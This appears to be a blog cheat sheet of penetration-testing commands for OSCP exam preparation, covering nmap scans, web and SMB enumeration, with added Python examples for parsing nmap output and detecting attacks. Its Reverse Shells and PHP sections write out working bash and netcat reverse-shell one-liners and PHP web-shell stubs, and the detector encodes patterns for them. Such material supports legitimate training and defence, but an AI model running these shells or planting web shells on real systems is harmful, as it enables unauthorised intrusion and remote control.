In a previous article, we shared a wide range of tools for sub-domain enumeration that help pentesters and bug hunters collect subdomains for the domain they are targeting.
Enumeration is the most important thing you can do. At that inevitable stage where you find yourself hitting a wall, 90% of the time it will be because you haven't done enough enumeration.
There are a ton of certifications in the hacking and security domain, but Offensive Security certifications are the ones that will really make you feel you have actually earned it, rather than just crossing your fingers and sitting an MCQ exam.
Yes, we're talking about OSCP (Offensive Security Certified Professional). OSCP preparation, the lab and the exam are an awesome journey where you will experience excitement, pain, suffering, frustration, confidence and motivation, with learning constant throughout.
A few commands that will be very helpful for OSCP preparation are listed below:
Nmap Commands
[#] Quick TCP Scan
Command: nmap -sC -sV -vv -oA quick 192.168.1.10
[#] Quick UDP Scan
Command: nmap -sU -sV -vv -oA quick_udp 192.168.1.10
[#] Full TCP Scan
Command: nmap -sC -sV -p- -vv -oA full 192.168.1.10
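The -oA flag in the three scans above writes the same results in three formats (.nmap, .gnmap, .xml). The grepable .gnmap file is the easiest to triage by script, whether you are deciding which of the later sections (web, SMB, SNMP) apply to a host, or inventorying what a box exposes. The parser below is an added example, not part of the original cheat sheet; SAMPLE_GNMAP is a hand-constructed imitation of what the quick scan might write to quick.gnmap, and its services and versions are made up.

```python
"""Parse the grepable (.gnmap) file that nmap's -oA writes and list open ports per host.

Added example, not part of the original cheat sheet. SAMPLE_GNMAP is a
hand-constructed imitation of what `nmap -sC -sV -vv -oA quick 192.168.1.10`
writes to quick.gnmap; the services and versions in it are made up.
"""
import re
from collections import defaultdict

SAMPLE_GNMAP = (
    "# Nmap 7.80 scan initiated as: nmap -sC -sV -vv -oA quick 192.168.1.10\n"
    "Host: 192.168.1.10 ()\tStatus: Up\n"
    "Host: 192.168.1.10 ()\tPorts: "
    "22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)/, "
    "80/open/tcp//http//Apache httpd 2.4.18 ((Ubuntu))/, "
    "139/filtered/tcp//netbios-ssn///, "
    "445/open/tcp//microsoft-ds//Samba smbd 3.X - 4.X (workgroup: WORKGROUP)/"
    "\tIgnored State: closed (996)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned in 60.00 seconds\n"
)

# One entry in the Ports: field is port/state/protocol/owner/service/rpc info/version/
# (nmap replaces any "/" inside a version string with "|", so [^/]* is safe here).
PORT_ENTRY = re.compile(r"(\d+)/([\w|]+)/(\w+)//([^/]*)//([^/]*)/")


def parse_gnmap(text):
    """Return {host: [(port, proto, service, version), ...]} for every open port."""
    results = defaultdict(list)
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\tIgnored State:", 1)[0]
        for port, state, proto, service, version in PORT_ENTRY.findall(ports_field):
            if state == "open":
                results[host].append((int(port), proto, service, version.strip()))
    return dict(results)


def port_spec(entries):
    """Comma-separated port list in the form nmap's -p flag accepts, e.g. "22,80,445"."""
    return ",".join(str(port) for port, _proto, _service, _version in entries)


def services_by_name(entries):
    """Map service name -> ports, to decide which later sections (web, SMB) apply."""
    by_name = defaultdict(list)
    for port, _proto, service, _version in entries:
        by_name[service].append(port)
    return dict(by_name)


if __name__ == "__main__":
    for host, entries in parse_gnmap(SAMPLE_GNMAP).items():
        print(host, "->", port_spec(entries))
        for port, proto, service, version in entries:
            print(f"  {port}/{proto}\t{service}\t{version}")
```

Run it against a real quick.gnmap by replacing SAMPLE_GNMAP with the file's contents; filtered and closed ports are dropped, and only the version field is trimmed.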
Web Scanning
[#] Nikto
Command: nikto -h 192.168.1.10
[#] Dirsearch
Command: python dirsearch.py -u http://192.168.1.10 -e php,txt,html,log,conf,cfg,ini,pdf -x 301,403,503,302 --random-agent
[#] Directory Buster
Command: dirb http://192.168.1.10/ /usr/share/wordlists/dirb/common.txt
[#] Whatweb
Command: whatweb -v -a 3 192.168.1.10
[#] Gobuster
Command: gobuster -e -u http://192.168.1.10/ -w /usr/share/wordlists/dirb/common.txt (gobuster 3.x requires the dir subcommand: gobuster dir -e -u http://192.168.1.10/ -w /usr/share/wordlists/dirb/common.txt)
[#] Wfuzz
Command: wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://192.168.1.10
[#] WPScan
Command: wpscan -u http://192.168.1.10/ (WPScan 3.x replaced -u with --url: wpscan --url http://192.168.1.10/)
[#] Joomscan
Command: joomscan -u http://192.168.1.10/
Port Checking
[#] Netcat Banner Grabbing
Command: nc -v 192.168.1.10 port
[#] Telnet Banner Grabbing
Command: telnet 192.168.1.10 port
SMB
[#] SMB Vulnerability Scan
Command: nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 192.168.1.10
[#] SMB Users & Shares Scan
Command: nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 192.168.1.10
[#] Enum4linux
Command: enum4linux -a 192.168.1.10
[#] Null connect
Command: rpcclient -U "" 192.168.1.10
[#] Connect to SMB share
Command: smbclient //MOUNT/share
SNMP
[#] SNMP Enumeration
Command: snmp-check 192.168.1.10 -c public
Python Servers
[#] Simple Web Server
Command: python -m SimpleHTTPServer 80 (Python 2; on Python 3 use python3 -m http.server 80)
[#] FTP Server
Command: python -m pyftpdlib -p 21 -w
Reverse Shells
[#] Bash Shell
Command: bash -i >& /dev/tcp/192.168.1.10/4443 0>&1
[#] Netcat linux
Command: nc -e /bin/sh 192.168.1.10 4443
[#] Netcat windows
Command: nc -e cmd.exe 192.168.1.10 4443
PHP
[#] PHP command Injection with system from GET Request
Command: <?php echo system($_GET["cmd"]);?>
[#] PHP Command Injection with Shell Exec from GET Request
Command: <?php echo shell_exec($_GET["cmd"]);?>
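The reverse-shell one-liners and the two PHP stubs above are also exactly what a blue team looks for in process logs, shell history and web-root files, and they are easy to fingerprint. The checker below is an added example, not part of the original page: its regexes are derived from the commands in the Reverse Shells and PHP sections, and SAMPLE_LINES is a constructed mix of those commands and benign look-alikes (the banner grab and an ordinary PHP echo) to show that the rules do not fire on everything that mentions nc or $_GET.

```python
"""Flag the reverse-shell one-liners and PHP command-injection stubs from this
cheat sheet when they show up in logs, shell history or web-root files.

Added example, not part of the original page. SAMPLE_LINES is constructed:
a mix of the page's own commands and benign look-alikes.
"""
import re

# Each rule is (name, compiled regex); the patterns are derived from the commands above.
RULES = [
    # bash -i >& /dev/tcp/<ip>/<port> 0>&1
    ("bash_dev_tcp", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d{1,5}")),
    # nc -e /bin/sh <ip> <port>  or  nc -e cmd.exe <ip> <port>
    ("netcat_exec", re.compile(
        r"\b(?:nc|ncat|netcat)\b[^\n]*\s-e\s+(?:/bin/(?:ba)?sh|cmd(?:\.exe)?)\b")),
    # <?php echo system($_GET["cmd"]);?>  and the shell_exec variant
    ("php_webshell", re.compile(
        r"\b(?:system|shell_exec|exec|passthru|popen)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b")),
]

SAMPLE_LINES = [
    "bash -i >& /dev/tcp/192.168.1.10/4443 0>&1",
    "nc -e /bin/sh 192.168.1.10 4443",
    "nc -e cmd.exe 192.168.1.10 4443",
    "nc -v 192.168.1.10 80",                              # banner grab, benign
    '<?php echo system($_GET["cmd"]);?>',
    '<?php echo shell_exec($_GET["cmd"]);?>',
    '<?php echo htmlspecialchars($_GET["name"]); ?>',     # ordinary PHP, benign
    "python -m SimpleHTTPServer 80",
]


def classify(line):
    """Return the names of every rule that matches one line (empty list if none)."""
    return [name for name, pattern in RULES if pattern.search(line)]


def scan_lines(lines):
    """Return [(index, rule_name), ...] for every line that trips a rule."""
    hits = []
    for index, line in enumerate(lines):
        for name in classify(line):
            hits.append((index, name))
    return hits


if __name__ == "__main__":
    for index, name in scan_lines(SAMPLE_LINES):
        print(f"line {index}: {name}: {SAMPLE_LINES[index]}")
```

Feed it auditd execve records, bash history or the output of a grep over the web root; the netcat rule deliberately requires the -e flag so a plain banner grab like nc -v host port is not flagged.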
SQL Injection
[#] SQL Injection Exploitation with Sqlmap
Command: sqlmap -u http://10.10.10.10 --dbs